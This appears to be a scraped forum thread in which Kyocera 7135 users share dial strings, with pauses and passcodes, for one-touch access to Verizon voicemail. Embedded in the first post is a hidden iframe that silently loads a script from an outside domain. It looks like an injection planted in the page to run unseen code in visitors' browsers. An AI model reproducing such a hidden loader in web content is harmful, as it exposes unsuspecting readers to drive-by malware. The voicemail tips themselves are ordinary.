+ Reply to Thread

How to insert password into voice mail

I seem to remember being able to program my password into my StarTac. This was a cool feature because after I dialed voice mail I could hit the button and it would send my password.

I'd like to do this for both Verizon vm and my work vm.

Has anyone accomplished this on the 7135 yet?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

In the messages application, go to the menu and access your voicemail settings.

From there, add your:
    • voicemail number
    • % - hard pause requiring a press of the "ok" key to continue
    • Enter whatever digit/character to prompt you for your password (for Verizon that's *)
    • , - 2 second pause
    • Your password

You can play with it to get the timing right, or change it around for however your other VM systems work. I do the above for Verizon, then add a ,1 at the end for starting to play my first message.

Mine looks like *86%*,,xxxx,1

Just remember: % = hard pause requiring keypress to release, and , = 2 second pause.

Converged. It didn't even hurt! tuckeyr's Avatar
    I created an entry in my address book called VM Home. I entered the call-in number, two commas for pauses, the * followed by a comma, my home phone number followed by a comma and then my password. You can enter the whole string of numbers required that way and then designate it as a speed dial number.

Tuckey
    Kyo 7135, XV 6600, XV 6700 and iPhone. Thanks to BT GPS, I even know where I stand!

Yeah, works great. I find it is helpful for other voice mail systems and time the commas before saving the sequence into a spped dial. It's not flawless, but much safer when driving to use a one-touch method.
    Cheers!

Frostie Dog

My setup is similar to HoTSynC's.... except I don't use the hard pause and instead have it just "regular" pause twice (,,), and then #xxxx (passcode). I only did this a few days ago, and it works great... but I hadn't yet included the "11" in the string to check new messages. I'm going to do that today

p.s. What is the benefit of a hard pause? (for checking VZ voice-mail)
    Please visit my picture site: Robert-O-Rama :)

When traveling, the time between establishing the call and waiting for the voicemail system to pickup can vary. In my home market it's fast, but traveling can add 2-5 seconds of delay between the timer starting and voicemail picking up. Because of this, I use the hard pause to release it when it's ready. From that point the timing is not an issue.

I suppose I could just put enough pauses to cover the delays when traveling, but when at home, I don't want to wait an extra 2, 4, or 6 seconds then I need to.

I do the same with my dumbphone Audiovox, however, I add a "#1" AFTER my password instead of ",1" -- The # confirms the password without have to wait for VZ to prompt you.

Just makes it get to the messages a lil faster!
    iPhone therefore iAm.

Thanks again HotSync. Some VZW VM systems might be slightly different in prompts. I had to type in *86,,#1757#1 to get mine to work correctly.

I opted not to use the hard pause because I found it difficult to press the ok button when the phone was to my ear.

Again, many thanks.

Depending on your service plan you might want to use your phone number instead of the *86 in order to save minutes. I have the cheapest plan Verizon offers and it seems that *86 counts against my regular minutes whereas calling my own number counts agains my 1000 anytime mobile-to-mobile minutes. Be sure to put your area code in with your number.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Originally posted by tmwebsites
    Depending on your service plan you might want to use your phone number instead of the *86 in order to save minutes. I have the cheapest plan Verizon offers and it seems that *86 counts against my regular minutes whereas calling my own number counts agains my 1000 anytime mobile-to-mobile minutes. Be sure to put your area code in with your number.
    Good point tmwebsites, Another reason is for checking your voicemail when you are roaming. I have found many networks that just laugh at you when you try to use *86.

FYI: In my expierence with Verizon, when you're out of a digital area you may not get the voicemail notification until you return to that area, so you may have to proactively check your vm using your area code when roaming.
    iPhone therefore iAm.

Yeah, that is true, no vm notification while roaming, so I always check manually every so often when roaming.
    ~'kito
    pdaPhoneHome Moderator

Originally posted by tmwebsites
    Be sure to put your area code in with your number.
    Not yet being a 7135 owner (c'mon, Verizon) I don't know if you lucky pioneers can utilize the auto area code feature as in the 6035 - Preferences/Phone/Dialing then Auto Area Code to always. Not important for saved or speed-dial numbers, but for on-the-fly use it saves time. Our (Boston) area has gone to 10# dialing for everything even though nearly all downtown numbers are still 617.

Not a big deal, but wondering if the 7135 has the same feature.

Ken

The 7135 has that feature. I couldn't find it in the user guide but they do actually explain it in the help area on the phone prefs screen.

Thanks!
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.